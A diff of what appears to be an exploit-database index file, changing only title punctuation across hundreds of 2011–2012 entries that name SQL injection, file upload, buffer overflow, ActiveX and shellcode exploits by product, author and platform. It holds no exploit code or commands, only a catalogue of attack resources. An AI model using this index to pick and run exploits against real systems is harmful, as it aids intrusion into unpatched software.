+17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum Injection Vulnerability",2011-03-23,eXeSoul,asp,webapps,0 17037,platforms/windows/remote/17037.rb,"PostgreSQL for Microsoft Windows Payload Execution",2011-03-23,metasploit,windows,remote,0 17038,platforms/windows/remote/17038.rb,"HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",2011-03-24,metasploit,windows,remote,80 @@ -14848,8 +14848,8 @@ id,file,description,date,author,platform,type,port 17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 (regist.php) SQL Injection Vulnerabiility",2011-04-02,"Easy Laster",php,webapps,0 17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 (index.php) SQL Injection Vulnerability",2011-04-02,"Easy Laster",php,webapps,0 17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 (index.php) SQL Injection Vulnerability",2011-04-03,keracker,php,webapps,0 -17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 -17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 +17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 +17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection Vulnerability",2011-04-03,keracker,php,webapps,0 17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection Vulnerability",2011-04-03,Egyptian.H4x0rz,php,webapps,0 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion Vulnerabilities",2011-04-03,KedAns-Dz,php,webapps,0 @@ -14886,7 +14886,7 @@ id,file,description,date,author,platform,type,port 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001 -17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,metasploit,windows,remote,0 +17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,metasploit,windows,remote,0 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,metasploit,windows,local,0 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,metasploit,windows,remote,25 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,metasploit,windows,remote,9090 @@ -14930,7 +14930,7 @@ id,file,description,date,author,platform,type,port 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 -17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 +17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 @@ -15106,7 +15106,7 @@ id,file,description,date,author,platform,type,port 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service Vulnerability PoC",2011-06-20,BraniX,windows,dos,0 -17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 Arbitrary File Download Vulnerability",2011-06-21,ShellVision,hardware,remote,0 +17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download Vulnerability",2011-06-21,ShellVision,hardware,remote,0 17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection Vulnerability",2011-06-21,"Brendan Coles",php,webapps,0 @@ -15220,7 +15220,7 @@ id,file,description,date,author,platform,type,port 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - CSRF Vulnerabilities",2011-07-21,Crazy_Hacker,php,webapps,0 17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x <= 4.1.3 - (messagegroupid) SQL Injection Vulnerability (0day)",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability",2011-07-21,v3n0m,php,webapps,0 -17557,platforms/windows/remote/17557.html,"Dell IT Assistant detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 +17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 17559,platforms/linux/shellcode/17559.c,"Linux x86 egghunt shellcode",2011-07-21,"Ali Raheem",linux,shellcode,0 17560,platforms/php/webapps/17560.txt,"Joomla Component mod_spo SQL Injection Vulnerability",2011-07-21,SeguridadBlanca,php,webapps,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys <= 2011.7.8.913 - Local Kernel Mode Privilege Escalation Exploit",2011-07-22,MJ0011,windows,local,0 @@ -15383,7 +15383,7 @@ id,file,description,date,author,platform,type,port 17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin <= 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin <= 1.0 - SQL Injection Vulnerability",2011-08-30,"Miroslav Stampar",php,webapps,0 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin <= 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 +17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection Vulnerability",2011-08-30,SubhashDasyam,php,webapps,0 17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit, DEP+ASLR Bypass.",2011-08-30,sickness,windows,local,0 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin <= 2.0.2 - SQL Injection Vulnerability",2011-08-30,"Miroslav Stampar",php,webapps,0 @@ -15545,7 +15545,7 @@ id,file,description,date,author,platform,type,port 17938,platforms/php/webapps/17938.txt,"EFront <= 3.6.9 Community Edition Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass",2011-10-07,modpr0be,windows,local,0 17940,platforms/linux_mips/shellcode/17940.c,"52 byte Linux MIPS execve",2011-10-07,entropy,linux_mips,shellcode,0 -17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 Arbitrary Command Execution",2011-10-07,metasploit,linux,webapps,0 +17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,metasploit,linux,webapps,0 17942,platforms/linux/local/17942.c,"pkexec Race Condition Privilege Escalation Exploit",2011-10-08,xi4oyu,linux,local,0 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 @@ -15610,7 +15610,7 @@ id,file,description,date,author,platform,type,port 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS Vuln.",2011-10-20,loneferret,windows,webapps,0 18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 18015,platforms/cgi/remote/18015.rb,"HP Power Manager 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0 -18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0 +18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome PoC, killing thread",2011-10-22,pigtail23,windows,dos,0 @@ -15639,7 +15639,7 @@ id,file,description,date,author,platform,type,port 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 -18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 +18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 @@ -15649,7 +15649,7 @@ id,file,description,date,author,platform,type,port 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit",2011-10-31,"Dillon Beresford",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 -18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 +18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader Local Root Exploit",2011-11-02,zx2c4,linux,local,0 18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability",2011-11-02,LiquidWorm,php,webapps,0 @@ -15703,7 +15703,7 @@ id,file,description,date,author,platform,type,port 18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial of Service Exploit",2011-11-16,condis,linux,dos,80 18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection Vulnerability",2011-11-16,"Asheesh kumar",hardware,webapps,0 -18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",2011-11-17,metasploit,windows,remote,0 +18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading Vulnerability",2011-11-19,metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection Vulnerability",2011-11-19,longrifle0x,php,webapps,0 @@ -15766,7 +15766,7 @@ id,file,description,date,author,platform,type,port 18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,metasploit,php,webapps,0 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 -18213,platforms/php/webapps/18213.php,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 +18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection, Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans <= 1.4.8 SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection Vulnerability",2011-12-08,Troy,php,webapps,0 @@ -15786,7 +15786,7 @@ id,file,description,date,author,platform,type,port 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 -18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 +18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-12-14,metasploit,php,webapps,0 18245,platforms/multiple/remote/18245.py,"Splunk Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 @@ -15946,7 +15946,7 @@ id,file,description,date,author,platform,type,port 18457,platforms/linux/dos/18457.py,"torrent-stats httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (64-bit) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 -18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 +18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component ActiveX DoS",2012-02-05,"Senator of Pirates",windows,dos,0 18464,platforms/php/webapps/18464.html,"GAzie <= 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 (base_qry_main.php t_view) SQL Injection Vulnerability",2012-02-06,"a.kadir altan",php,webapps,0 @@ -15966,7 +15966,7 @@ id,file,description,date,author,platform,type,port 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Multiple Vulnerabilities (LFI - XSS)",2012-02-12,"Avram Marius",php,webapps,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling Vulnerability",2012-02-16,metasploit,windows,remote,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF Vulnerability",2012-02-16,"Ivano Binetti",php,webapps,0 -18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 +18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger <= 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview <= 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 @@ -16060,7 +16060,7 @@ id,file,description,date,author,platform,type,port 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 -18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 +18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,metasploit,windows,remote,0 18605,platforms/windows/webapps/18605.txt,"sockso <= 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services Use After Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 @@ -16164,7 +16164,7 @@ id,file,description,date,author,platform,type,port 18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",2012-04-09,metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 -18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",2012-04-10,metasploit,windows,remote,0 +18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,metasploit,windows,remote,0 18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) SQL Injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) SQL Injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 18730,platforms/multiple/remote/18730.rb,"Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",2012-04-11,metasploit,multiple,remote,0 @@ -16229,7 +16229,7 @@ id,file,description,date,author,platform,type,port 18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - XSS Vulnerability",2012-04-30,Vulnerability-Lab,asp,webapps,0 18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 -18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 +18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 @@ -16285,7 +16285,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 -18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 Authentication Bypass Vulnerability",2012-05-15,"Jean Pascal Pereira",php,webapps,0 +18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass Vulnerability",2012-05-15,"Jean Pascal Pereira",php,webapps,0 18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 Backend XSS And SQLi Vulnerability",2012-05-08,"Stefan Schurtz",php,webapps,0 18885,platforms/linux/shellcode/18885.c,"linux/x86 execve(/bin/dash) 42 bytes",2012-05-16,X-h4ck,linux,shellcode,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - Multiple Vulnerabilities (CSRF - Persistent XSS)",2012-05-16,"Ivano Binetti",php,webapps,0 @@ -16378,7 +16378,7 @@ id,file,description,date,author,platform,type,port 18993,platforms/php/webapps/18993.php,"Wordpress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18994,platforms/php/webapps/18994.php,"Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 - SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 @@ -16387,7 +16387,7 @@ id,file,description,date,author,platform,type,port 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 19007,platforms/php/webapps/19007.php,"PHPNet <= 1.8 (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"Wordpress Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 -19009,platforms/php/webapps/19009.php,"Wordpress Omni Secure Files Plugin 0.1.13 Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 +19009,platforms/php/webapps/19009.php,"Wordpress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 @@ -16397,7 +16397,7 @@ id,file,description,date,author,platform,type,port 19020,platforms/php/webapps/19020.txt,"Wordpress Simple Download Button Shortcode Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19021,platforms/php/webapps/19021.txt,"Wordpress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19022,platforms/php/webapps/19022.txt,"Wordpress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19023,platforms/php/webapps/19023.php,"Wordpress wpStoreCart Plugin 2.5.27-2.5.29 Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 +19023,platforms/php/webapps/19023.php,"Wordpress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog Buffer Overflow 2.07.14",2012-06-08,metasploit,windows,remote,0 19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0 @@ -16411,7 +16411,7 @@ id,file,description,date,author,platform,type,port 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling Vulnerability (MS12-005)",2012-06-11,metasploit,windows,local,0 -19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0 +19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd Buffer Overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0 19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 /usr/bin/chroot Vulnerability",1991-05-01,anonymous,aix,dos,0 @@ -16432,7 +16432,7 @@ id,file,description,date,author,platform,type,port 19056,platforms/php/webapps/19056.txt,"Wordpress Mac Photo Gallery 2.7 - Arbitrary File 